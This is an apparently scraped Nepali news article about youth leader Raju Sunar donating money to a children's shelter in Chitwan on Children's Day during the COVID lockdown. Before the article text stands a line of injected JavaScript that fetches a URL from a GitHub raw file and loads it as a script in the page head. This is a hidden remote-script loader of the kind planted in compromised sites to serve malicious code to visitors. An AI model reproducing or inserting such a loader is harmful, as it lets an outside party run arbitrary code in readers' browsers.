;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौं।
चितवन भरतपुर महानगरपालिकामा रहेको मञ्जुश्रीअसाहाय संरक्षण केन्द्रमा नेपाली काङ्ग्रेसका महाधिवेशन प्रतिनिधि एवम् नेपाल दलित विद्यार्थी सङ्घका केन्द्रीय अध्यक्ष राजु सुनारले बाल दिवसको अवसर पारेर २०७७ भाद्र २९ गते संस्थाकी अध्यक्ष मञ्जु खाँडको हातमा आर्थिक सहयोग सहयोग गरेका हुन्।
आफ्नो कामको सिलसिलामा युवा नेता राजु सुनार र जीवन घताने चितवन पुगेका थिए, बालदिवसको मौका पारेर सो संरक्षण केन्द्रलाई सहयोग गरेका हुन्।
कोरोना भाइरसको कारण लकडाउन भएसंगै युवा नेता सुनारले धेरै ठाउँमा आर्थिक तथा खाद्यान्नहरु सहयोग गर्दै आएका छन्।
फेसबुक प्रतिक्रियाहरु